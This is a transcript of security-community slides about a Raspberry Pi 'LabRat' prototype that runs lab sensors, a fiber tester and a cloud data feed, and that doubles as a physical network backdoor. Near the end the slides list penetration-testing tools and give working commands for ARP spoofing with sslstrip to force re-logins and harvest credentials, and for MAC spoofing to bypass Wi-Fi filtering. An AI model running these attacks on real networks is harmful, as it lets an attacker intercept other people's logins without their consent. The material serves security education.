The LabRat - Physical backdoor hacks and IOT primer
-
Upload
nu-the-open-security-community -
Category
Education
-
view
1.448 -
download
2
description
Transcript of The LabRat - Physical backdoor hacks and IOT primer
The LabRat Physical Backdoor Hacks
and Internet of Things (IOT) Primer
Akshat Sharma, TME, Cisco Systems.
The Raspberry Pi
http://www.raspberrypi.org/downloads Image Downloads and Updates http://elinux.org/RPi_Low-level_peripherals -- working with gpio http://elinux.org/RPiconfig interfacing with screens.
Google’s your Best Friend
Raspberry Pi as a Physical Backdoor into your network
http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html
It’s a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.” -- CEO of Pwnie Express, Dave Porcello
Rogue APs
Mac Spoofing on wired Networks
MITM attacks
Humidity Sensor
CH0
CH3
CLK
CS (AL)
MOSI
MISO
IR LED -
Receiver
IR LED -
Receiver
Optical Fiber
CH1 CH2
Binary Signal In
Binary Signal In
The LabRat Circuit Temperature
Sensor
Humidity Sensor
Optical Fiber Tester
The LabRat- a Proof of Concept Prototype
The Raspberry Pi – a 35$ Linux Computer that powers the LabRat prototype.
To get more info on the Raspberry pi – visit http://www.raspberrypi.org/
The LabRat Prototype Current Setup
10 inch Capacitive Touchscreen
Optical Fiber Tester
Humidity Sensor Temperature
Sensor
Raspberry-Pi
HDMi-to-LVDS converter board
10,000 mAH Lithium Polymer Battery
The LabRat Prototype LM 35 + ADS7841 Temperature Sensor
LM 35 Temperature Sensor ADS7841
Analog to Digital Converter
The LabRat Prototype Humidity Sensor SMD + ADS7841
ADS7841 Analog to Digital Converter
Humidity Sensor SMD
The LabRat Prototype Optical Fiber Tester
Optical Fiber Holders
Infra-red LED-Receiver Combination to transmit Messages via the Fiber
Connecting to an IOT Cloud ⁻ https://xively.com/ ⁻ Formerly Cosm, Pachube
Set up a Cosm (Now Xively) Account
• Register on cosm (xively) and Add Device
• You will Receive an API Key and FEED ID
• Now use the old Cosm eeml library to set up Datastreams from the Raspberry Pi
Setting up the Python Script to send Data to Xively
Install EEML package from github sudo apt-get install python-dev sudo apt-get install python-pip sudo easy_install -U distribute sudo pip install rpi.gpio >>>> work with Rpi GPIO pins wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python-eeml/tarball/master tar zxvf geekman-python-eeml.tar.gz cd geekman-python-eeml* sudo python setup.py install
Set up Python Script # source eeml package import eeml
<snip> API_KEY = 'YOUR_API_KEY' FEED = YOUR_FEED_ID API_URL = '/v2/feeds/{feednum}.xml' .format(feednum = FEED)
The LabRat Prototype Online Real-Time Feed –
Temperature and Humidity Visit the Real-Time Feed at https://cosm.com/feeds/89297
The LabRat Prototype Python Scripts
1) Python Script to upload the Temperature and Humidity Data to an online Cloud
based feed that displays how the LabRat , in the Future, may do the same with Sensory Data at Customer Labs to provide Real-Time Analytics.
2) The same Python Script sends an email to lab-admins whenever the Temperature , humidity values exceed a pre-decided Threshold 3) Another Python Script to send messages (Binary Data) through an Optical Fiber using an Infrared LED-Receiver combination and email the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
The LabRat Prototype Current List of Penetration-Testing Tools
Information Gathering ------------------- wireshark tcpflow ngrep hostmap kismet btscanner sslscan sslstrip sslsniff ssldump tcptraceroute netmask tcpdump zenmap nmap arp-fingerprint dnswalk dnstracer
Vulnerability Assessment ---------------------- airodump-ng sqlmap nikto svcrack
Exploitation Tools ------------------ aircrack-ng airmon-ng airodump-ng aireplay-ng sqlninja exploit-db
Privilege Escalation ----------------- wireshark ettercap tcpreplay tcpick packit packeth dsnniff
Maintaining Access ---------------- ptunnel netcat ftp-proxt udp-tunnel proxychains dns2tcp
DEMO - Arp Spoofing using SSLstrip and arpspoof - Mac Spoofing using Airmon-ng and
macchanger - Packet Sniffing using Wireshark - Other MITM attacks
Arp Spoofing and Mac-Spoofing Attacks
Arp Spoofing • Set up Port Forwarding iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 echo '1' > /proc/sys/net/ipv4/ip_forward
• Start Arp spoofing. Spoof the Gateway arpspoof -i wlan0 <gateway address>
• Start sslstrip and log User Information (use –k option to logout users from their current sessions, forcing them to re-login) sslstrip -k -l 8080
Mac Spoofing on Wifi (How to bypass Mac Filtering) • ifconfig etho down • airmon-ng start wlan0 • iwlist wlan0 scanning • airodump-ng –c 6 -a --bssid <mac address
of wireless access point> --- Gives info of connected devices • Ifconfig wlan0 down • Now use machchanger • Macchanger –m <mac of allowed
devices> wlan0 • Ifconfig wlan0 up
Putting The Internet of Things into Perspective Co-incidental Cisco Plugin :p
Thank You